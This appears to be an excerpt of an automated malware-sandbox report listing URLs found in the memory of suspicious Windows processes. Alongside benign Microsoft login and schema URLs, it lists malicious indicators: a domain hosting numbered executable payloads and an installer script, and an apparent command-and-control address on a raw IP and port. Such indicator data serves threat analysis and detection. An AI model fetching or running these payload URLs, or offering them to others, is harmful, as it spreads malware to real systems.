Source: sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859818262.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859642379.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019401468.000001A6A432C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
Source: svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels01
Source: svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1
Source: svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk1.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk1.exeMozilla/5.0
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk10.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk11.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk12.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk13.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk14.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk15.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk16.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk17.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk18.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk19.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk2.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk2.exehttp://twizt.net/lk3.exehttp://twizt.net/lk4.exehttp://twizt.net/lk5.exehttp
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk20.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk3.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk4.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk5.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk6.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk7.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk8.exe
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/lk9.exe
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exe
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exe7
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exeO
Source: f5TWdT5EAc.exe, 00000000.00000003.1366451263.0000000004CF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exeP0
Source: 34D7.exe, 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmp, 34D7.exe, 00000003.00000000.1336483986.0000000000252000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://twizt.net/newtpp.exeP0%
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exes
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.php
Source: f5TWdT5EAc.exe, 00000000.00000003.1366451263.0000000004CF1000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmp, 34D7.exe, 00000003.00000000.1336483986.0000000000252000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://twizt.net/peinstall.php%temp%%s
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpG
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpJ
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpO
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpZ
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phph
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpmp
Source: 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpppData
Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://twizt.net/rh.exe
Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/rh.exe$
Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/rh.exe&m
Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/rh.exeBn9
Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/rh.exeLj_
Source: 1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://twizt.net/rh.exeP0U
Source: 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/rh.exeZn
Source: sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp, 2910625892.exe	String found in binary or memory: http://www.geoplugin.net/json.gp?ip=
Source: svchost.exe, 0000000A.00000002.1704092821.000000000270C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1704642025.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, fontdrvhost.exe, 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f
Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fkernelbasentdllkernel32GetProcessMitiga
Source: svchost.exe, 0000000A.00000002.1704092821.000000000270C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fx
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=806014
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749005384.000001A6A4357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 0000000A.00000003.1629040986.0000000002D9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-query
Source: svchost.exe, 0000000A.00000003.1629040986.0000000002D9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000011.00000003.1925775502.000001A6A3AF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000011.00000003.1954487406.000001A6A435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DmhFZ
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000011.00000003.1749104984.000001A6A436B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749439809.000001A6A4356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
